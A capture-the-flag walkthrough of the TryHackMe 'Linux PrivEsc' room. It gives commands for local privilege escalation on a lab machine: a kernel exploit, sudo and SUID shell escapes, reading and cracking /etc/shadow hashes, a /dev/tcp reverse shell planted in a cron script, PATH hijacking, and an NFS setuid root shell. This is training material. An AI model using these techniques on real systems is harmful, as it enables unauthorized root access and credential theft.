# Linux PrivEsc

This room can be found [here](https://tryhackme.com/room/linprivesc). This room covers a few methods of escalating from a normal user to the root user on a system.&#x20;

## Task 3

This task has us launch a machine and access it via the browser **OR** ssh into the machine with the username `karen` and password `Password1`.

Enumeration is typically one of the first steps you take when gaining access to a system.&#x20;

### Question 1: What is the hostname of the target system?

`wade7363` - We run `hostname` to find our answer.

### Question 2: What is the Linux kernel version of the target system?

`3.13.0-24-generic` - We can run `uname -a` to find this info

### Question 3: What Linux is this?

`Ubuntu 14.04 LTS` - We can run cat `/etc/issue` OR cat `/etc/os-release` to find this issue

### Question 4: What version of the Python language is installed on the system?

`2.7.6` - Running `python -V` will show this info

### Question 5: What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)

`CVE-2015-1328` - If we search our kernel version, `3.13.0-24-generic`,  on ExploidDB we find [this CVE](https://www.exploit-db.com/exploits/37292).&#x20;

## Task 5

This task has us find a vulnerability (found from task 3) to exploit the machine with to gain access to the root account. We will obtain .c file exploit, get it to our victim machine, compile it, run it, and become root.

### Question 1: What is the content of the flag1.txt file?

`THM-28392872729920` - After downloading the .c file exploit from Task 3, we can get it onto our victim machine in whatever we can. A common way is via a Python Webserver.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Frkks6h2fC67eqqszLzxq%2Fimage.png?alt=media\&token=17e8339a-fe39-4f1e-9217-1e07f8d57805)

Now we can `wget` the file to the `/tmp/` directory on the victim

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FZLV2rLAUYxFfG9wrOqzZ%2Fimage.png?alt=media\&token=16720a6f-24fb-42e5-9c6a-464ceee21444)

Now we need to compile the code. `gcc pwn.c -o pwned` and execute the new file `./pwned`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fv5U9muHNukRpXkDqAhip%2Fimage.png?alt=media\&token=7fe9d0d6-80c1-4ac9-8be0-c7f5fc1ce92d)

We verify we have escalated our privilege and are the root user with `whoami`. We should see root.

To find the flag I ran `find / -name flag*.txt`.

We can now `cat` the file to receive our flag.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FFpx4htYBu0ZN8Tw2QPvX%2Fimage.png?alt=media\&token=2a63d824-92de-49e9-88bb-6edf656240e3)

## Task 6

### Question 1: How many programs can the user "karen" run on the target system with sudo rights?

`3` - we can run `sudo -l` to find this answer. She has access to `find`, `less`, and `nano`.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fkd0Ip0qW8PZCjLqGRV6r%2Fimage.png?alt=media\&token=4ce6b4bb-9cb9-40cb-bb22-de033959980d)

### Question 2: What is the content of the flag2.txt file?

`THM-402028394` - We cna look on [GTFOBins](https://gtfobins.github.io/) and look for ways to use the commands Karen does have access to run with sudo rights. Looking up find we see:

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fljwg1fMnWY3OhI5YlCIm%2Fimage.png?alt=media\&token=75123bf2-5299-4a00-9929-9c5dcad10520)

So let's run `sudo find . -exec /bin/sh ; -quit` and see if we get root.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FsjSelB3iQz8q4HYuVmgC%2Fimage.png?alt=media\&token=1421e83e-8630-4386-9a83-82c0fd8f412f)

We do! So now we can find our flag.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FfDp2nrD4ZKF8DmtHijhO%2Fimage.png?alt=media\&token=70ebac3a-bbb6-4cac-aeee-045d0fa867b5)

### Question 3: How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

`sudo nmap --interactive` - Searching for Nmap on [GTFOBins](https://gtfobins.github.io/gtfobins/nmap/) will give us our answer.

### Question 4: What is the hash of frank's password?

`$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1` - The `/etc/shadow` file contains information about a Linux system's users, their passwords, and more. So if we cat that file, we can get franks password hash

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FVOb9buF0ph5gCJuD78hE%2Fimage.png?alt=media\&token=1b41c75c-ee8f-4065-af74-d48e66db2941)

## Task 7

### Question 1: Which user shares the name of a great comic book writer?

`gerryconway` - Like in Task 6, we can list users and password using /etc/shadow, except we don't have permission, there is another file we can view though. `/etc/passwd`.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FHjIwdk2K9ElxrErGuf1E%2Fimage.png?alt=media\&token=d247eebe-ab81-4809-82dc-02ee5347ef91)

Be sure to copy the contents of the /etc/passwd file to a .txt file

### Question 2: What is the password of user2?

`Password1` - The room lets us know we can run `find / -type f -perm -04000 -ls 2>/dev/null` to find  SUID permissions. After looking through this list and comparing it to [GTFOBins](https://gtfobins.github.io/#+suid), I find one that they have in common, base64.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F4AjrXqf1noPPa7jusbq2%2Fimage.png?alt=media\&token=d34a6bb4-6290-4010-9b2b-e1785891736c)

This basically says if we assign the variable of LFILE to to a file, then use base64 to encode, then decode that file, we can then read that file. Since we are after the password for the user, we want to the see the `/etc/shadow` file.

`LFILE=/etc/shadow`

`base64 "$LFILE" | base64 --decode`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F7wLSM2XbsEgfcyZw73P0%2Fimage.png?alt=media\&token=37baa7ee-8727-4694-86ef-5d64bba7bd47)

Now we can use unshadow from the JohnTheRipper package to combine the files

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FqnB7WYJ3jcqcmBAixCS4%2Fimage.png?alt=media\&token=68934179-7c0b-4d53-beed-a5f4f0058a3d)

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FUCGEu9nhh48zLpdCtZXY%2Fimage.png?alt=media\&token=0e22453f-20df-4941-b8a8-14cecaaaeff5)

Time to crack the passwords!

`john --wordlist=(WORDLIST.TXT) (FILE.TXT)`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F63gJAiCCpOwMmwCRXhrq%2Fimage.png?alt=media\&token=20f9bc5e-7e24-4e9e-b034-b8054e595e1a)

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FHmKWyQ3K97wtirpdJio7%2Fimage.png?alt=media\&token=666eb4d5-0ca2-4a6b-99a8-77e0b06ed9f9)

### Question 3: What is the content of the flag3.txt file?

`THM-3847834` - Since we execute commands as root using the base64 SUID, we can find this with the same method.

Running `find / -name flag3.txt` reveals it is under `/home/ubuntu/,` so cd to that directory.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FPM0xnUGKyQs9sak1TOJv%2Fimage.png?alt=media\&token=be485c25-887a-4d0e-85de-7638d62c3eb0)

## Task 8

This task focuses on Capabilities to gain root access. Root gives Karen access to use vim, but that is all. This shows us how that can be leveraged to become root.

### Question 1: How many binaries have set capabilities?

`6` - Running `getcap -r / 2>/dev/null` will give us our answer. If we ran this without the `2>/dev/null` we would also see a lot of errors on screen.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FMOtFLNCYZIUk0VoObCEw%2Fimage.png?alt=media\&token=49c797f1-1d72-429f-a561-724099bca1fb)

### Question 2: What other binary can be used through its capabilities?

`View` - Since we can see that Karen can use vim, we look through the [GTFOBins](https://gtfobins.github.io/gtfobins/vim/) to see that we can escalate our privileges. If we `ls` we see karen has a vim file in her directory, but it's owned by root, which means we can leverage this to gain root.

&#x20;After testing the first 2 Shell options, I found the 3rd option worked ./`vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'`. Running THIS vim rather than the one inside of `/usr/bin/` will get us our root shell.

### Questionn 3:What is the content of the flag4.txt file?

`THM-9349843` - After obtaining root, we can find the file location, cat it, obtaining our answer.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fa3lWodF3w0WEtmE29Itm%2Fimage.png?alt=media\&token=8e0b8ac3-83f1-40bf-add6-b81f1c3e8fcf)

## Task 9

In this task we figure out how leverage Cron Jobs, schedule tasks, to become root.

### Question 1: How many user-defined cron jobs can you see on the target system?

`4` - We can look at /`etc/crontab` to find this answer. This is available for nay user to look at.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F6DLM8QRa6wuQOhxvh33a%2Fimage.png?alt=media\&token=568e2182-28df-4290-b962-8832e6e1aa78)

### Question 2: What is the content of the flag5.txt file?

`THM-383000283` - If we `ls` we see we have a `backup.sh` file, which that is also in our `crontab`. We can look at the contents on the backup.sh file, also make a backup of it as well with `cp backup.sh backup.sh.bak`. Looking at the original with ls -l, we notice it is not executable, so let's fix that with `chmod +x backup.sh`. We can edit the .sh file and add in a reverse shell command.

`bash -i >& /dev/tcp/<OUR_MACHINE_IP>/<PORT> 0>&1`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FAMbh3xz9RYjKz3cd2uPy%2Fimage.png?alt=media\&token=9caae41a-7244-46d2-8f47-a902426a05b2)

In another terminal we can start our netcat listener

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FOS9sDw7lJL5QKDBTLoY3%2Fimage.png?alt=media\&token=6586aa26-43db-4d5e-8396-5e77d6de7050)

Now we wait for the crontab to run. After a minute or two, we should receive our root shell.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fx8eEY6AjKQDpDJ2SepHy%2Fimage.png?alt=media\&token=a327c9ae-4a42-464e-8f57-3b8138dab8bb)

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FKXRILs5PblSHRcOfy8WE%2Fimage.png?alt=media\&token=fcff0322-d8f0-4391-993f-4269344bd1d8)

### Question 3: What is Matt's password?

`123456` - Running `cat /etc/shadow | grep matt` will give us his hash. Copy that to a .txt file and crack it.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FhYbl0ASlClFQKKK9RMUo%2Fimage.png?alt=media\&token=590de82c-4845-465e-9a7d-f233703e5894)

## Task 10

### Question 1: What is the odd folder you have write access for?

`/home/murdoch` - Running `find / -writable 2>/dev/null | grep home | cut -d "/" -f 2,3 | sort -u` will show us our answer. So we have write access to murdochs home folder.

### Question 2: What is the content of the flag6.txt file?

`THM-736628929` - The hint from the question with no answer is "You can add the writable directory to your user's PATH and create a file named "thm" that the "./test" executable will read. The "thm" file can simply be a "cat" command that will read the flag file."

First we need to locate the file.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FMymsSWv9R3nPoekojxDF%2Fimage.png?alt=media\&token=ec09ecaa-4bbd-46d4-aee5-5ec7847c5104)

Now we `echo $PATH`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F7CBDKGV97f0mjtZdS4ez%2Fimage.png?alt=media\&token=e739a9f1-28dc-48b4-81f1-ae1c45b5ee50)

Now we add the folder we have write access to, to our path with `export PATH=/home/murdoch:$PATH`.

Now we create a file called `thm` with the contents of `cat /home/matt/flag6.txt` under `/home/murdoch`, then we change the permissions of the file with `chmod 777 thm`.

From here we can run `./test` and obtain our flag.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fn6IbeSrrYqDLmbNIhKfu%2Fimage.png?alt=media\&token=aa0d73ee-4b29-4884-9f3d-f6cd77ca8bc4)

## Task 11

### Question 1: How many mountable shares can you identify on the target system?

`3` - Running `showmount -e (IP`) will give us our answer

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FHqpZe2iiuqqzEXGXQXz2%2Fimage.png?alt=media\&token=b2c76a47-8873-451c-9f5b-f0b32c2286f2)

### Question 2: How many shares have the "no\_root\_squash" option enabled?

`3` - Running cat `/etc/exports` will give us our answer. This checks the NFS configuration

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FONPatVhDiDUnuunygYvG%2Fimage.png?alt=media\&token=b5814c26-bfa9-437e-8bbd-8af686e323e3)

### Question 3: What is the content of the flag7.txt file?

`THM-89384012` - We can now mount the NFS onto our machine `mount -o rw (IP):(FOLDER) (FOLDER_ON_OUR_MACHINE)`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FUEFhLFpDh3a3F7SotMt9%2Fimage.png?alt=media\&token=2bb782bb-aeae-44f8-b4a9-f97c3bd31d64)

The room gives us an executable we can run on the machine. I made a file nfs.c with the contents

```
int main()
{ setgid(0);
 setuid(0);
 system("/bin/bash");
 return 0;
}
```

Now we can compile it with `gcc nfs.c -o nfs -w`. Change the permissions of the file, `chmod +s nfs`

We can now execute the file on the target machine from the tmp directory, `cd /tmp && ./nfs` and obtain root. We can then obtain our flag with `cat /home/matt/flag7.txt`.

## Task 12

* User: leonard
* Password: Penny123

For this, this is  utilizing how a lot of the tools and methods we have used in the previous tasks. We can SSH into the machine and begin.&#x20;

We can use tools such as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) that was discussed in Task4 but for now we'll go over the manual ways that were covered.

### Question 1: What is the content of the flag1.txt file?

`THM-42828719920544` -&#x20;

Started this by looking at the SUID Permissions.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fr0vEnX3raX9c1Xp3kpXw%2Fimage.png?alt=media\&token=544f392c-9121-44cd-9af3-b6d8d211da65)

We can see that base64 can be used. So as in Task 7, we can follow the same suit.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F8EXiS9Rp8GwCWCYva7K0%2Fimage.png?alt=media\&token=b8693376-52f7-4c41-b91d-4ab306cb3e3d)

So let's try to cat the /etc/shadow file.

`LFILE=/etc/shadow`

`base64 "$LFILE" | base64 --decode`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FAwQC9FljP2VdIk21bLEM%2Fimage.png?alt=media\&token=098a204c-4d91-4454-a401-fc4128ac1dfc)

We can get the hashes for root, and missy.

`root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::`

`missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::`

We can put these files in a .txt file and attempt to crack them.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FbYiPcU1ig7MAB1j1Fvvi%2Fimage.png?alt=media\&token=7b188035-296c-4e43-aa52-688e69bdadae)

We got the password for Missy! So lets switch users to missy. `su missy`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FqnC8Jg8C7LtB6ghzAJs0%2Fimage.png?alt=media\&token=71ed919e-b40f-4aa7-9d69-48b77ea218ee)

`sudo find / -name flag*.txt` We now have the location of our flags as well

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F5hF6EJHSxHVRviZqyggF%2Fimage.png?alt=media\&token=fa52035a-b5cb-4d24-8139-76f8430babcd)

### Question 2: What is the content of the flag2.txt file?

`THM-168824782390238` -&#x20;

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FzXqsAgG3xPFsMhg7t8U4%2Fimage.png?alt=media\&token=458a8422-a2da-49fe-8cee-e9a18ffd80de)

Sadly we don't have permission to the 2nd flag but lets see what sudo permissions Missy has with `sudo -l`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fsgv2U263pBSDt1rZl0WM%2Fimage.png?alt=media\&token=acd91a5e-d492-4b2e-bbbc-0a6dae68871f)

We see Missy can run `find`. Similar to task 6, we can use the GTFO bin we used for that.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FwvrA9aS991cOtzAuaTnz%2Fimage.png?alt=media\&token=4f94098a-7886-4f42-bb98-0528b4096d12)

`sudo find . -exec /bin/sh ; -quit`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F5Cfm2D1cCGxVwshGDP79%2Fimage.png?alt=media\&token=8c441aa2-6e33-48e7-97d3-41d59d235852)

We are now root, can cat our file for our final flag!

`cat /home/rootflag/flag2.txt`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FiVNvHlXqVbllcmZz1DDU%2Fimage.png?alt=media\&token=e24bc18c-23f9-496f-a3b3-e9c337f4a995)

## Congratulations! You have completed the Linux PrivEsc room!